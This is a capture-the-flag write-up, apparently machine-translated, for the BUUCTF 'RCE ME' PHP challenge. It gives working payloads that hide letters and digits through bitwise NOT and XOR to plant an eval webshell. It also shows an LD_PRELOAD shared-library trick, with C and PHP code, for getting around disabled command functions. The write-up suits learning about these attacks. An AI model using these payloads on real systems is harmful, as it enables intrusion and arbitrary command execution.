link : buuctf [ Geek challenge 2019]RCE ME.

Write it at the front

Ah, I learned a lot of new knowledge through this question , Record here , I really procrastinate , It needs a change , It's a long way to go

No alphanumeric RCE

To bypass by negating or XOR , That is, a string without alphanumeric characters is constructed by taking the negative or exclusive or payload.
Here, I want to construct a structure to connect the ant sword payload As shown below ：

code=assert(eval($_POST['ma']));
 Or is it 
code=$_=_GET;${
    $_}[_](${
    $_}[__]);&_=assert&__=eval($_POST['ma']);

Use the negative method to get through php Of urlencode After coding, we get payload as follows :

code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%DD%92%9E%DD%A2%D6%D6);

By exclusive or php Of urlencode After coding payload as follows

code=$_=%ff%ff%ff%ff^%a0%b8%ba%ab;${
    $_}[_](${
    $_}[__]);&_=assert&__=eval($_POST['ma']);

Successfully connected ant sword

Hijack share so

Found in the ant sword flag And reading flag Executable program of , Guess to run the executable to get flag.

adopt code=$_=%ff%ff%ff%ff^%a0%b8%ba%ab;${$_}[_](${$_}[__]);&_=assert&__=phpinfo()
It is found that most functions that can execute commands are disabled orz

Then I went into the unknown , link : Reference article ： Explain profound theories in simple language LD_PRELOAD & putenv().
You can use the plug-in of ant sword （ Bypass disable_functions）, It can also be used. github The file of , Here I mainly record the method I learned from the principle .

LD_PRELOAD

LD_PRELOAD The shared library file of the specified environment variable path will be called one step before other shared libraries , adopt putenv You can set the environment variable .
So we can think of , Write a function that will call the shared library file php Program , Then write a function with the same name c Language program ( Contains the command you want to execute ), And generate .so Share the library file and then go through putenv Set to LD_PRELOAD. So in php When the program runs, it will call the function with the same name we wrote according to the link rules , This achieves hijacking sharing so Purpose .

__ attribute __ ((constructor))

The method of writing functions with the same name is naturally feasible （ Such as geteuid）, A more general approach is to use __attribute__((constructor)), It will start at the beginning of the program , Triggered when the shared library starts loading .

Execution process

The first is to write and execute c Language program

#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>

__attribute__((__constructor__)) void angel(){
    
    unsetenv("LD_PRELOAD");
    system("/readflag > /var/tmp/1.txt");
}

Then generate the shared library file 1.so

gcc 1.c -fPIC -shared -o 1.so

Write the corresponding php Program

<?php 
    putenv("LD_PRELOAD=/var/tmp/1.so");
    mail("","","","");
    var_dump(file_get_contents('/var/tmp/1.txt'));
?>

take php Document and so Upload files

adopt include Include uploading files to load shared libraries and execute commands .
The command you want to upload is

code=$_=_GET;${
    $_}[_](${
    $_}[__]);&_=assert&__=include('/var/tmp/1.php');

payload by

code=$_=%ff%ff%ff%ff^%a0%b8%ba%ab;${
    $_}[_](${
    $_}[__]);&_=assert&__=include('/var/tmp/1.php');

Finally get flag